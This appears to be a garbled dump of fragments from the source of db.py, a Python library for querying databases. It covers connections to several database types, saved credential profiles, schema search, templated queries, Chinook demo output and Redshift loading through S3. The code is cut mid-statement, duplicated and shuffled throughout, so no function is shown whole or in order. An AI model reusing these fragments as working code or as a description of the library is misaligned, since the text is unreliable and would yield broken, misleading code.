{}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list)", "self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q)", "db = DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0", "from .utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates # attempt", "# see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df = len(df) chunks", "7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\"", "your database's schema for a table. Parameters ----------- search: str glob pattern for", "= profile return profiles def remove_profile(name, s3=False): \"\"\" Removes a profile from your", "option for printing sql statement that will be executed bucket_location: boto.s3.connection.Location a specific", "= self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname elif hasattr(self,", "to default. # we can't do this in the function definition because we're", "f = profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return prof.get('tables', None) def", "Evil Walks 0.99 >>> template = ''' ... SELECT ... '{{ name }}'", "script data: list, dict Optional argument for handlebars-queries. Data will be passed to", "2 4 5 Princess of the Dawn 3 2 5 6 Put The", "name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a", "(optional) identifier/name for your database (i.e. \"dw\", \"prod\") from db import DB import", "| INTEGER | | Track | TrackId | INTEGER | | Track |", "False profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False): \"\"\" Removes a profile", "import re import os import sys from collections import defaultdict import pandas as", "port = 5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port = None", "order to operate). This includes things like schema definitions. Most of you probably", "how normal loading is performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type']))", "3 Restless and Wild 4 Restless and Wild 5 For Those About To", "multiple-of-slices. Ex: DW1.XL nodes have 2 slices per node, so if running 2", "\\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx,", "| INTEGER | | Album | ArtistId | INTEGER | | Artist |", "means that you'll have verrrrrrrry wide columns in some cases. driver: str, None", "re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert = \"insert", "self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\"))", "Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>,", "u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}}", "+--------+--------------------------+ | Table | Columns | +--------+--------------------------+ | Album | AlbumId, Title, ArtistId", "For Those About To Rock (We Salute You) 0.99 1 Balls to the", "for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q =", "like to drop the table if it already exists chunk_size: int (10000) Number", "InvoiceLine | InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER |", "on. defaults to default port for db. portgres: 5432 redshift: 5439 mysql: 3306", "elif arg==\"hostname\": arg = \"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur", "+---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+ | Table | Column", "issue where rows are not in the same order, making doctest fail. db.find_column(\"Name\")", "redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't", "pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your database from", "use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name =", "len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>>", "sort in some way for all those doctests to be viable... -= if", "return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any", "= True except ImportError: try: import pypyodbc as pyo HAS_ODBC = True except", "column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name", "format. need to convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") #", "except Exception as e: raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name, e))", "schema definitions. Most of you probably don't need this, but if you're a", "arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value = getattr(self,", "_assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\",", "For Those About To Rock (We Salute You) 1 1 1 2 Balls", "etc AWS_ACCESS_KEY: str your aws access key. if this is None, the function", "your aws access key. if this is None, the function will try and", "or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2 library. Please ensure it", "u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles =", "as sqlite HAS_SQLITE = True except ImportError: HAS_SQLITE = False try: import pyodbc", "Name AlbumId MediaTypeId \\ 0 1 For Those About To Rock (We Salute", "f: creds = load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname')", "it by adding limit={X} to the `query` method, or by passing an argument", "dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all credentials for the database.\"\"\"", "frame. limit: int Number of records to return Examples -------- >>> from db", "match how normal loading is performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'],", "Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER |", "\"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\")", "sys.stderr.write(\"Copying data from s3 to redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data'", "| Genre | GenreId | INTEGER | | Invoice | InvoiceId | INTEGER", "<NAME> 343719 11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1", "is a prefix, so it'll pick up # all of the data*.gz files", "[\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q = \"select *", "You 8 For Those About To Rock We Salute You 9 For Those", "in which to create the temporary transfer s3 bucket. This should match your", "\"\"\"Save the database credentials, plus the database properties to your db.py profile.\"\"\" if", "faster when it comes time to run the \\COPY statment. # # see", "is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password", "and attach to each table to the table name in dict for (table_schema,", "= [] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def", "u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\")", "| +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Customer | SupportRepId", "self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys =", "if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure it", "database (i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds =", "which to create the temporary transfer s3 bucket. This should match your redshift", "| INTEGER | | Customer | SupportRepId | INTEGER | | Customer |", "in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile)", "= [] table_meta = {} # pull out column metadata for all tables", "mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q", "... FROM ... {{ name }} ... GROUP BY ... table_name ... '''", "u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb',", "prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials,", "Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719 1 1 None 342562", "normal loading is performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else:", "then adapt for redshift sql = pd.io.sql.get_schema(df, name) # defaults to using SQLite", "MySQLdb or pymysql library. Please ensure it is installed\") creds = {} for", "Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\",", "is used by the DB.query method. You can override it by adding limit={X}", "results = db.find_table(\"*\") # returns everything \"\"\" tables = [] for table in", "db import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table |", "cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache:", "return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search through your database's schema", "Inject The Venom 1 1 8 9 Snowballed 1 1 9 10 Evil", "load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column,", "342562 2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619 3 1", "'{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's", "password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False):", "| Customer | Address | NVARCHAR(70) | | Employee | Address | NVARCHAR(70)", "q=q) return q def _apply_handlebars(self, q, data, union=True): if (sys.version_info < (3, 0)):", "len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For Those About To Rock We", "tables containing trans >>> results = db.find_table(\"*\") # returns everything \"\"\" tables =", "so we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema. This will take a", "identifier/name for your database (i.e. \"dw\", \"prod\") from db import DB import pymysql", "and Wild 3 Restless and Wild 4 Restless and Wild 5 For Those", "named \"Name\" +-----------+-------------+---------------+ | Table | Column Name | Type | +-----------+-------------+---------------+ |", "= creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise", "t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache: self._tables", "= \"select * from ({q}) q limit {limit}\".format(q=q, limit=limit) return q # mssql", "| Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type", "PlaylistId | INTEGER | | PlaylistTrack | TrackId | INTEGER | | PlaylistTrack", "but if you're a db admin you might actually want to query the", "credentials / profile for how you like your queries exclude_system_tables: bool Whether or", "... ''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False))", "table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur: # second", "is # much faster when it comes time to run the \\COPY statment.", "Exception(\"Profile '{0}' does not exist. Could not find file {1}\".format(name, f)) os.remove(f) except", "AWS location in which to create the temporary transfer s3 bucket. This should", "Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t,", "if this is None, the function will try and grab AWS_ACCESS_KEY from your", "definition because we're # lazily importing boto only if necessary here. if bucket_location", "Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1", "the relevant database libraries # TODO: maybe add warnings? try: import psycopg2 as", "schema from pandas and then adapt for redshift sql = pd.io.sql.get_schema(df, name) #", "Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all tables prefixed w/", "self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k] for k in ('schema', 'name',", "None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None},", "{k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format", "verrrrrrrry wide columns in some cases. driver: str, None Driver for mssql/pyodbc connections.", "| NVARCHAR(70) | | Customer | SupportRepId | INTEGER | | Customer |", "tables = [row[0] for row in self.cur.execute(\"select name from sqlite_master where type='table';\")] for", "return profiles def remove_profile(name, s3=False): \"\"\" Removes a profile from your config \"\"\"", "argument to `DB()`. None indicates that there will be no limit (That's right,", "GROUP BY ... table_name ... ''' >>> data = [ ... {\"name\": \"Album\"},", "for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT", "f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for i in", "self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not", "creds = {} for arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self,", "except ImportError: HAS_MYSQL = False try: import sqlite3 as sqlite HAS_SQLITE = True", "refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema again and looks for any", "table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col", "library. Please ensure it is installed\") creds = {} for arg in [\"username\",", "4 5 Princess of the Dawn 3 2 5 6 Put The Finger", "file. Parameters ---------- filename: str A SQL script data: list, dict Optional argument", "stealing your passwords. Parameters ---------- profile: str (optional) identifier/name for your database (i.e.", "HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. Please ensure it is installed\") self.con =", "self.password = password self.hostname = hostname self.port = port self.filename = filename self.dbname", "Restless and Wild 4 Restless and Wild 5 For Those About To Rock", "want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access key. if this is", "q = self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q, limit) return pd.read_sql(q,", "find pyodbc or pymssql libraries. Please ensure one of them is installed\") if", "True except ImportError: HAS_SQLITE = False try: import pyodbc as pyo HAS_ODBC =", "| | Track | TrackId | INTEGER | | Track | AlbumId |", "or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify", "returns all columns have an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ |", "0.99 4 6290521 0.99 5 6713451 0.99 6 7636561 0.99 7 6852860 0.99", "... INNER JOIN ... Track t ... on a.AlbumId = t.AlbumId; ... '''", "[] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for (table_name, sql) in self.cur: rgx", "if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None return { \"username\":", "HAS_ODBC = True except ImportError: try: import pypyodbc as pyo HAS_ODBC = True", "it already exists chunk_size: int (10000) Number of DataFrame chunks to upload and", "None: pass else: raise Exception(\"Database type not specified! Must select one of: postgres,", "\"localhost\", \"10.20.1.248\") port: int Port the database is running on. defaults to default", "dbname: str Name of the database schemas: list List of schemas to include.", "sensitive data, but it will probably stop your little sister from stealing your", "= [data_type] cols = [] for table in self.tables: for col in vars(table):", "port self.filename = filename self.dbname = dbname self.dbtype = dbtype self.schemas = schemas", "0.99 5 Put The Finger On You 0.99 6 Let's Get It Up", "chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8'))", "data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type: continue if", "to the Wall 2 2 3 Restless and Wild 2 3 4 Let", "Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for redshift.\") try:", "1 Artist 275 2 Track 3503 >>> q = ''' ... SELECT ...", "\\(\\[(.*)\\]\\)\" if sql is None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql):", "dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db =", "{1}\".format(name, f)) os.remove(f) except Exception as e: raise Exception(\"Could not remove profile {0}!", "from your environment variables s3: S3 alternative to using keys, you can use", "int, None Default number of keys to display in the foreign and reference", "4 Restless and Wild 5 For Those About To Rock We Salute You", "= creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname =", "= profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username = creds.get('username') self.password =", "metadata for the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def", "8 Inject The Venom 1 1 8 9 Snowballed 1 1 9 10", "cnt ... FROM ... {{ name }} ... GROUP BY ... table_name ...", "s3: f = os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID +", "t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all threads for t", "PrettyTable a bit. None means that you'll have verrrrrrrry wide columns in some", "to sqlite database dbname: str Name of the database schemas: list List of", "1 For Those About To Rock We Salute You 1 1 2 Balls", "dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>,", "value = getattr(self, arg) if arg==\"username\": arg = \"user\" elif arg==\"password\": arg =", "... a.Title, ... t.Name, ... t.UnitPrice ... FROM ... Album a ... INNER", "elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] = value", "key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation", "`AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on specific buckets", "limit={X} to the `query` method, or by passing an argument to `DB()`. None", "time, database-wide, if query is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None),", "| INTEGER | | Customer | CustomerId | INTEGER | | Employee |", "ColumnSet from .table import Table, TableSet from .s3 import S3 from .utils import", "limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your", "table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except", "table to the table name in dict for (table_schema, table_name, column_name, data_type) in", "Those About To Rock We Salute You 6 For Those About To Rock", "len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk", "fit into our framework), so we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema.", "= [template(item) for item in data] query = [str(item) for item in query]", "AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument or as", "or '' ) conn_str = ((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format(", "the template and rendered using handlebars. union: bool Whether or not \"UNION ALL\"", "self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port,", "0 1 For Those About To Rock (We Salute You) 1 1 1", "if told to use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata.", "to using SQLite format. need to convert it to Postgres sql = sql.replace(\"[\",", "\"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\":", "those doctests to be viable... -= if not, there's always a random issue", "function argument or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise", "[template(item) for item in data] query = [str(item) for item in query] if", "@staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return", "if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} >", "users with permission on specific buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4())", "def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e: print (\"Error executing command:\")", "2 3990994 0.99 3 4331779 0.99 4 6290521 0.99 5 6713451 0.99 6", "str name for your shiny new table df: DataFrame data frame you want", "(i.e. \"localhost\", \"10.20.1.248\") port: int Port the database is running on. defaults to", "except ImportError: raise Exception(\"Couldn't find boto library. Please ensure it is installed\") if", "= DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\",", "isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type: continue if isinstance(getattr(table, col),", "table metadata for the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables", "None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY", "AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is", "self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb", "9 Evil Walks 0.99 >>> template = ''' ... SELECT ... '{{ name", "----------- search: str glob pattern for what you're looking for data_type: str, list", "\"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for", "union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables (at least", "columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes", "GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\")", ">>> from db import DemoDB >>> db = DemoDB() db.query(\"select * from Track\").head(2)", "| Customer | SupportRepId | INTEGER | | Customer | CustomerId | INTEGER", "dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port = 1433 elif profile is not", "find_column(self, search, data_type=None): \"\"\" Aggresively search through your database's schema for a column.", "| GenreId | INTEGER | | Invoice | InvoiceId | INTEGER | |", "def credentials(self): \"\"\"Dict representation of all credentials for the database.\"\"\" if self.filename: db_filename", "Rock (We Salute You) 0.99 1 Balls to the Wall 0.99 2 Fast", "= \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit()", "of the Dawn 3 2 5 6 Put The Finger On You 1", "glob import gzip try: from StringIO import StringIO # Python 2.7 except: from", "{0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance of DB", "1 GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719 1 1", "# postgres, mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if", "try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\",", "to return Examples -------- >>> from db import DemoDB >>> db = DemoDB()", "\"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username =", "db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod", "defaults to using SQLite format. need to convert it to Postgres sql =", "9 Snowballed 1 1 9 10 Evil Walks 1 1 GenreId Composer Milliseconds", "Album | AlbumId | INTEGER | | Album | ArtistId | INTEGER |", "from cache # 2. use a single query for getting all key relationships", "db import DemoDB >>> db = DemoDB() >>> q = ''' ... SELECT", "db.find_table(\"*\") # returns everything \"\"\" tables = [] for table in self.tables: if", "tuples, to match how normal loading is performed for col in table['columns']: col_meta.append((col['schema'],", "username is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename", "| | Track | Milliseconds | INTEGER | | Track | GenreId |", ">>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f", "AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY')", ".s3 import S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import", "defaultdict import pandas as pd import pybars from .column import Column, ColumnSet from", "mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB", "create the table ONLY if it doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE", "to the Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__))", "... ] >>> db.query(q, data=data) table_name cnt 0 Album 347 1 Artist 275", ". }} ... {{else}} ... {{ . }} , ... {{/if}} ... {{/cols}}", "[\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title", "passwords. Parameters ---------- profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\")", "1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice", "which data type(s) you want to return Examples ---------- >>> from db import", "<NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>,", "like schema definitions. Most of you probably don't need this, but if you're", "sql statement that will be executed bucket_location: boto.s3.connection.Location a specific AWS location in", "elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port", "0.99 4 Princess of the Dawn 0.99 5 Put The Finger On You", "table_name, ... COUNT(*) as cnt ... FROM ... {{ name }} ... GROUP", "db drop_if_exists: bool (False) whether you'd like to drop the table if it", "script. Parameters ---------- profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\")", "keys_per_column=None, driver=None, cache=False): if port is None: if dbtype==\"postgres\": port = 5432 elif", "= profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self,", "self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for item in data] query =", "205662 6 1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834", "Album; ... ''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data,", "pyo HAS_ODBC = True except ImportError: try: import pypyodbc as pyo HAS_ODBC =", "__init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None,", "i in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all", "import S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates", "or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise", "[] for table in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search): if", "<NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>,", "mssql: 1433 filename: str path to sqlite database dbname: str Name of the", "you'll have verrrrrrrry wide columns in some cases. driver: str, None Driver for", "\"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search", "= keys_per_column self.driver = driver if self.dbtype is None: raise Exception(\"Database type not", "uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname =", "if not HAS_PG: raise Exception(\"Couldn't find 